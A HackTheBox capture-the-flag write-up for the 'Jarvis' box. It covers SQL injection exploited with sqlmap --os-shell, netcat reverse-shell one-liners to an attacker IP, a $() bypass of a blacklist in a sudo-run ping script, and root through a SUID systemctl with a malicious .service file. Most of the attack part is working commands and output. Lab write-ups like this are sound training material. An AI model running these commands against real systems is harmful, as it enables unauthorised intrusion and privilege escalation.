HackTheBox - Jarvis

5 minute read

Jarvis was a nice 30 point box created by manulqwerty and Ghostpp7. It started out by finding SQL Injection in a vulnerable parameter and using sqlmap to get an os-shell, abusing a sudo script to get user and finally exploiting a SUID systemctl to get root.

User.txt

Nmap


We start the box with a quick TCP nmap scan:

# ports=$(nmap -sT -p- --min-rate=5000 --max-retries=2 10.10.10.143 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) && 
nmap -sV -sC -T4 -p$ports 10.10.10.143

PORT      STATE SERVICE VERSION                                       
22/tcp    open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)                                                                                                      
| ssh-hostkey:                                     
|   2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)                 
|   256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_  256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))             
| http-cookie-flags:                                  
|   /:                                                           
|     PHPSESSID:                                                                 
|_      httponly flag not set       
|_http-server-header: Apache/2.4.25 (Debian)          
|_http-title: Stark Hotel                                                                                                  
64999/tcp open  http    Apache httpd 2.4.25 ((Debian))                                                                     
|_http-server-header: Apache/2.4.25 (Debian)                                                                               
|_http-title: Site doesn't have a title (text/html).                                                                       
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


HTTP


Navigating to http://10.10.10.143/ we come across the following page:


Browsing around the site we come across the rooms available for booking:


Checking out one of the rooms and we get the following page:


We notice the URL has a parameter cod= taking a number as input which points us to a specific room, adding a ' to the end of the URL you’ll notice the following change in output:


Sqlmap –os-shell


After some simple enumeration with sqlmap we confirm the parameter is vulnerable to SQL Injection and use the --os-shell option to exploit it:

# sqlmap -u "http://10.10.10.143/room.php?cod=1" --os-shell
...
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4

what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default, /srv/www') (default) 
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1

os-shell> id
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'

Now we have command exeuction as www-data we can simply send ourselves a netcat reverse shell from our os-shell command prompt:

os-shell> nc 10.10.14.6 443 -e /bin/bash

─────────────────────────────────────────────────────────────────────────────────────────────────────────────
# nc -nlvp 443
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.143.
Ncat: Connection from 10.10.10.143:36332.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@jarvis:/var/www/html$


www-data to Pepper


Running sudo -l as www-data we notice the following script can be run as pepper

www-data@jarvis:/var/www/html$ sudo -l
Matching Defaults entries for www-data on jarvis:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
    (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py

Checking out the script we notice the following function executes the ping command and that it is blacklisting specific characters to ‘prevent’ command execution:

def exec_ping():
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
os.system('ping ' + command)

Unfortunately for pepper this blacklist is missing some crucial characters which we’re able to leverage in order to get command execution and subsequently a shell as pepper.


Pepper shell


We can use $() to bypass the blacklist and achieve command execution, as demonstrated below:

www-data@jarvis:/var/www/html$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p

***********************************************
     _                 _                       
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ 
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/ 
                                @ironhackers.es
                                
***********************************************

Enter an IP: $(whoami)
$(whoami)
ping: pepper: Temporary failure in name resolution

We can see here that pepper is returned and we now have successful command execution. To get a shell as pepper we can add a netcat command into a shell script and call that script in a similar fashion to our whoami command:

www-data@jarvis:/var/www/html$ echo 'nc 10.10.14.6 1234 -e /bin/bash' > /tmp/shell.sh
www-data@jarvis:/var/www/html$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p

***********************************************
     _                 _                       
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ 
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/ 
                                @ironhackers.es
                                
***********************************************

Enter an IP: $(bash /tmp/shell.sh)
$(bash /tmp/shell.sh)

─────────────────────────────────────────────────────────────────────────────────────────────────────────────
# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.143.
Ncat: Connection from 10.10.10.143:52160.
id
uid=1000(pepper) gid=1000(pepper) groups=1000(pepper)
python -c 'import pty; pty.spawn("/bin/bash")'
pepper@jarvis:/var/www/html$


Flag


With our shell as pepper we can simply cat the user flag.

pepper@jarvis:~$ cat user.txt
cat user.txt
2afa36...



Root.txt

SUID


During our usual Linux enumeration we notice that systemctl has the SUID flag set and find a reference to it at GTFOBins.

pepper@jarvis:~$ find / -perm -u=s -type f 2>/dev/null
/bin/systemctl


systemctl


systemctl allows us to control the systemd system and service manager.

systemctl may be used to introspect and control the state of the systemd system and service manager.

In order to exploit this we need to first create a malicious .service file structured like the following:

[Service]
ExecStart=/bin/bash /home/pepper/root.sh
[Install]
WantedBy=multi-user.target

We then echo it into our malicious .service file

pepper@jarvis:~$ echo '[Service]
> ExecStart=/bin/bash /home/pepper/root.sh
> [Install]
> WantedBy=multi-user.target' >/home/pepper/root.service

Secondly we need to create a bash script with a reverse shell inside that will be called by our service file and execute our reverse shell with root privileges:

pepper@jarvis:~$ echo 'nc 10.10.14.6 1337 -e /bin/bash' > /home/pepper/root.sh


Flag


All we need to do now is link and enable our malicious service file and we get root.

pepper@jarvis:~$ systemctl link /home/pepper/root.service
Created symlink /etc/systemd/system/root.service -> /home/pepper/root.service.

pepper@jarvis:~$ systemctl enable --now /home/pepper/root.service
Created symlink /etc/systemd/system/multi-user.target.wants/root.service -> /home/pepper/root.service.


─────────────────────────────────────────────────────────────────────────────────────────────────────────────
# nc -nvlp 1337
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.143.
Ncat: Connection from 10.10.10.143:59882.
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
d41d8c...